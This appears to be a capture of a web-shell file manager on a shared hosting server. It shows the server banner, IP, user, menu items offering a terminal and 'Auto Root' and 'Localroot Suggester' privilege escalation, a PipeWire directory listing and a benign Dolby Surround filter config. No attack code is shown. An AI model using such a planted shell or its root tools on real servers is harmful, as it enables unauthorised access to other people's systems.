Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
pipewire /
filter-chain /
Delete
Unzip
Name
Size
Permission
Date
Action
demonic.conf
2.16
KB
-rw-r--r--
2026-09-02 06:51
sink-dolby-surround.conf
1.57
KB
-rw-r--r--
2026-09-02 06:51
sink-eq6.conf
2.54
KB
-rw-r--r--
2026-09-02 06:51
sink-make-LFE.conf
2.06
KB
-rw-r--r--
2026-09-02 06:51
sink-matrix-spatialiser.conf
1.3
KB
-rw-r--r--
2026-09-02 06:51
sink-mix-FL-FR.conf
1.29
KB
-rw-r--r--
2026-09-02 06:51
sink-upmix-5.1-filter.conf
5.86
KB
-rw-r--r--
2026-09-02 06:51
sink-virtual-surround-5.1-kemar.conf
6.72
KB
-rw-r--r--
2026-09-02 06:51
sink-virtual-surround-7.1-hesuvi.conf
6.35
KB
-rw-r--r--
2026-09-02 06:51
source-duplicate-FL.conf
1.74
KB
-rw-r--r--
2026-09-02 06:51
source-rnnoise.conf
1.41
KB
-rw-r--r--
2026-09-02 06:51
Save
Rename
# Dolby Surround encoder sink # # Copy this file into a conf.d/ directory such as # ~/.config/pipewire/filter-chain.conf.d/ # context.modules = [ { name = libpipewire-module-filter-chain flags = [ nofail ] args = { node.description = "Dolby Surround Sink" media.name = "Dolby Surround Sink" filter.graph = { nodes = [ { type = builtin name = mixer label = mixer control = { "Gain 1" = 0.5 "Gain 2" = 0.5 } } { type = ladspa name = enc plugin = surround_encoder_1401 label = surroundEncoder } ] links = [ { output = "mixer:Out" input = "enc:S" } ] inputs = [ "enc:L" "enc:R" "enc:C" null "mixer:In 1" "mixer:In 2" ] outputs = [ "enc:Lt" "enc:Rt" ] } capture.props = { node.name = "effect_input.dolby_surround" media.class = Audio/Sink audio.channels = 6 audio.position = [ FL FR FC LFE SL SR ] } playback.props = { node.name = "effect_output.dolby_surround" node.passive = true audio.channels = 2 audio.position = [ FL FR ] } } } ]